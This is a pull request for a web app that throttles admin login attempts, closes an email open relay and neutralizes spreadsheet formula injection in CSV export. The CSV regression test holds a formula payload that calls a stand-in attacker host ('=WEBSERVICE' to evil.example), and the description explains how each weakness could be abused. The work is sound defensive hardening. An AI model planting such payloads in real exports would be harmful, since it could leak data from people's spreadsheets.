### PR TITLE
fix: harden admin login, email allowlist, and CSV export

### DIFF
--- a/src/app/api/mba-jobs/email/__tests__/route.test.ts
+++ b/src/app/api/mba-jobs/email/__tests__/route.test.ts
@@ -119,6 +119,24 @@ describe("POST /api/mba-jobs/email", () => {
     expect(mockSend).not.toHaveBeenCalled();
   });
 
+  it("does not treat a '*' allowlist entry as an open relay", async () => {
+    // A literal "*" must no longer match every recipient (CWE-862). With only
+    // "*" configured, an arbitrary recipient is rejected rather than mailed.
+    process.env.MBA_DIGEST_ALLOWED_RECIPIENTS = "*";
+
+    const response = await POST(
+      makeRequest({
+        to: "victim@anywhere.example",
+        jobs: [validJob],
+      })
+    );
+    const body = await response.json();
+
+    expect(response.status).toBe(403);
+    expect(body.error).toMatch(/approved recipients/i);
+    expect(mockSend).not.toHaveBeenCalled();
+  });
+
   it("caps an oversized digest to 25 jobs instead of rejecting it", async () => {
     const response = await POST(
       makeRequest({
@@ -229,7 +247,7 @@ describe("POST /api/mba-jobs/email", () => {
   });
 
   it("rejects requests with more than 5 recipients in the to array", async () => {
-    process.env.MBA_DIGEST_ALLOWED_RECIPIENTS = "*";
+    process.env.MBA_DIGEST_ALLOWED_RECIPIENTS = "@example.com";
 
     const response = await POST(
       makeRequest({
@@ -252,7 +270,7 @@ describe("POST /api/mba-jobs/email", () => {
   });
 
   it("dedupes recipients before applying the per-request ceiling", async () => {
-    process.env.MBA_DIGEST_ALLOWED_RECIPIENTS = "*";
+    process.env.MBA_DIGEST_ALLOWED_RECIPIENTS = "@example.com";
 
     const response = await POST(
       makeRequest({
@@ -276,7 +294,7 @@ describe("POST /api/mba-jobs/email", () => {
   });
 
   it("returns 429 when the per-day recipient ceiling would be exceeded", async () => {
-    process.env.MBA_DIGEST_ALLOWED_RECIPIENTS = "*";
+    process.env.MBA_DIGEST_ALLOWED_RECIPIENTS = "@example.com";
 
     // Exhaust the day: 10 requests of 5 recipients each = 50 (the cap).
     // Each request comes from a unique client so the per-IP rate limit

--- a/src/app/api/mba-jobs/email/route.ts
+++ b/src/app/api/mba-jobs/email/route.ts
@@ -123,7 +123,10 @@ function isAllowedRecipient(email: string): boolean {
   if (allowedRecipients.length === 0) return false;
 
   return allowedRecipients.some((allowed) => {
-    if (allowed === "*") return true;
+    // No wildcard open-relay branch: a "*" entry would let any unauthenticated
+    // caller send mail from the domain-verified sender to arbitrary recipients
+    // (CWE-862). Only exact addresses and explicit "@domain" suffixes match; a
+    // literal "*" in the env list is treated as a normal (never-matching) entry.
     if (allowed.startsWith("@")) return email.endsWith(allowed);
     return email === allowed;
   });

--- a/src/lib/__tests__/mba-applications.test.ts
+++ b/src/lib/__tests__/mba-applications.test.ts
@@ -123,5 +123,27 @@ describe("mba applications storage helpers", () => {
     expect(csv).toContain("Status,Priority,Company");
     expect(csv).toContain('"Recruiter said, ""follow up"""');
   });
+
+  it("neutralizes spreadsheet formula injection in exported CSV", () => {
+    const base = createMBAApplicationFromJob(job);
+    const application = {
+      ...base,
+      notes: "@SUM(A1:A9)",
+      jobSnapshot: {
+        ...base.jobSnapshot,
+        location: '=WEBSERVICE("https://evil.example/x")',
+      },
+    };
+
+    const csv = buildMBAApplicationsCsv([application]);
+
+    // A leading formula character (= + - @, or tab/CR) is prefixed with a
+    // single quote so Excel/Sheets treats the cell as text, not a formula.
+    expect(csv).toContain("'=WEBSERVICE");
+    expect(csv).toContain("'@SUM(A1:A9)");
+    // The raw formula must never sit at a cell boundary where it would evaluate.
+    expect(csv).not.toMatch(/,=WEBSERVICE/);
+    expect(csv).not.toMatch(/,@SUM/);
+  });
 });
 

--- a/src/lib/auth.ts
+++ b/src/lib/auth.ts
@@ -1,6 +1,7 @@
 import { NextAuthOptions } from "next-auth";
 import CredentialsProvider from "next-auth/providers/credentials";
 import { createHash, timingSafeEqual } from "crypto";
+import { authRateLimiter, getClientIpFromHeaders } from "@/lib/rateLimit";
 
 /**
  * Constant-time string comparison.
@@ -25,7 +26,7 @@ export const authOptions: NextAuthOptions = {
         username: { label: "Username", type: "text" },
         password: { label: "Password", type: "password" }
       },
-      async authorize(credentials) {
+      async authorize(credentials, req) {
         const expectedUsername = process.env.ADMIN_USERNAME;
         const expectedPassword = process.env.ADMIN_PASSWORD;
 
@@ -38,6 +39,21 @@ export const authOptions: NextAuthOptions = {
         }
 
         if (!credentials?.username || !credentials?.password) {
+          return null;
+        }
+
+        // Throttle online credential guessing (CWE-307). NextAuth's credentials
+        // provider adds no built-in brute-force protection, so without this an
+        // attacker can make unlimited password attempts against the single
+        // admin account. authRateLimiter allows 5 attempts per 15 minutes per
+        // client IP; once exhausted, further attempts are refused as if the
+        // credentials were wrong (each call to check() counts as one attempt).
+        // NOTE: the limiter is per-process in-memory, so on multi-instance
+        // serverless it throttles per instance rather than globally — a shared
+        // store would close that residual gap.
+        const clientIp = getClientIpFromHeaders(req?.headers);
+        const throttle = authRateLimiter.check(`admin-login:${clientIp}`);
+        if (!throttle.success) {
           return null;
         }
 

--- a/src/lib/mba-applications.ts
+++ b/src/lib/mba-applications.ts
@@ -434,7 +434,16 @@ export function parseMBAApplicationsImport(raw: string): MBATrackedApplication[]
 }
 
 function csvCell(value: unknown): string {
-  const text = String(value ?? "");
+  let text = String(value ?? "");
+  // Neutralize spreadsheet formula injection (CWE-1236). A cell that begins
+  // with =, +, -, @, tab, or carriage return is evaluated as a formula by
+  // Excel/Sheets, so an attacker-influenced field (a scraped job's location or
+  // department, or any field from an imported tracker JSON) could exfiltrate
+  // adjacent cells. Prefix a single quote so the spreadsheet treats it as
+  // literal text. Do this before the quote/comma/newline wrapping below.
+  if (/^[=+\-@\t\r]/.test(text)) {
+    text = `'${text}`;
+  }
   if (/[",\n\r]/.test(text)) {
     return `"${text.replace(/"/g, "\"\"")}"`;
   }

--- a/src/lib/rateLimit.ts
+++ b/src/lib/rateLimit.ts
@@ -125,19 +125,41 @@ export const emailDigestRateLimiter = new RateLimiter({
  * entry is client-supplied and spoofable, so it is intentionally the last
  * resort. Returns "unknown" when nothing is available (a single shared bucket).
  */
-export function getClientIp(request: NextRequest): string {
-  const netlifyIp = request.headers.get("x-nf-client-connection-ip");
+function resolveClientIp(
+  getHeader: (name: string) => string | null | undefined
+): string {
+  const netlifyIp = getHeader("x-nf-client-connection-ip");
   if (netlifyIp) {
     return netlifyIp.trim();
   }
 
-  const realIp = request.headers.get("x-real-ip");
+  const realIp = getHeader("x-real-ip");
   if (realIp) {
     return realIp.trim();
   }
 
-  const forwarded = request.headers.get("x-forwarded-for");
+  const forwarded = getHeader("x-forwarded-for");
   return forwarded?.split(",")[0]?.trim() || "unknown";
+}
+
+export function getClientIp(request: NextRequest): string {
+  return resolveClientIp((name) => request.headers.get(name));
+}
+
+/**
+ * Resolve the client IP from a plain headers object (lowercased keys), for
+ * contexts that do not have a NextRequest — notably NextAuth's `authorize`
+ * callback, whose `req.headers` is a plain object rather than a Headers
+ * instance. Same header precedence as getClientIp; returns "unknown" (a single
+ * shared bucket) when nothing is available.
+ */
+export function getClientIpFromHeaders(
+  headers: Record<string, string | string[] | undefined> | undefined
+): string {
+  return resolveClientIp((name) => {
+    const value = headers?.[name];
+    return Array.isArray(value) ? value[0] : value;
+  });
 }
 
 // Helper function to get client identifier.


### PR DESCRIPTION
Addresses three findings from a security scan of `src/app/api` and `src/lib` (medium effort, three-lens adversarial verification). All three were confirmed by the panel; none are high/critical.

## F1 — Admin login brute-force throttle (CWE-307)
The NextAuth credentials `authorize()` compared the posted username/password against `ADMIN_USERNAME`/`ADMIN_PASSWORD` on every request with no throttle, while a purpose-built `authRateLimiter` (5 attempts/15min) already existed but was never wired in. An attacker could run unlimited online password guessing against the single admin account; a hit yields a 7-day admin JWT.

Fix wires `authRateLimiter` into `authorize()`, keyed on client IP. Once the budget is spent, attempts are refused as if the credentials were wrong. Adds `getClientIpFromHeaders` to read the IP from `authorize()`'s plain request object (no `NextRequest` available there).

## F2 — Email digest open relay (CWE-862)
`src/app/api/mba-jobs/email/route.ts` sent real mail from the domain-verified sender `no-reply@isaacavazquez.com`, gated only by `isAllowedRecipient()`, which had a `*` branch that made it an open relay when a wildcard allowlist was configured. Removed the `*` branch; exact addresses and explicit `@domain` suffixes still match.

## F3 — CSV formula injection (CWE-1236)
`buildMBAApplicationsCsv` only quoted cells containing quotes/commas/newlines and never neutralized a leading formula character, so an attacker-influenced field (scraped location/department, or an imported tracker JSON) starting with `= + - @` was emitted verbatim and evaluated by Excel/Sheets on open. `csvCell` now prefixes such cells with a single quote so they're treated as text.

## Residual (not addressed here)
The rate limiter and the email daily-counter remain per-process in-memory, so on multi-instance serverless they throttle per instance rather than globally. Closing that needs a shared/durable store and is a separate, larger change.

## Tests
Adds regression tests for the wildcard rejection and CSV neutralization. Affected suites pass (auth, rateLimit, email route, mba-applications); typecheck clean.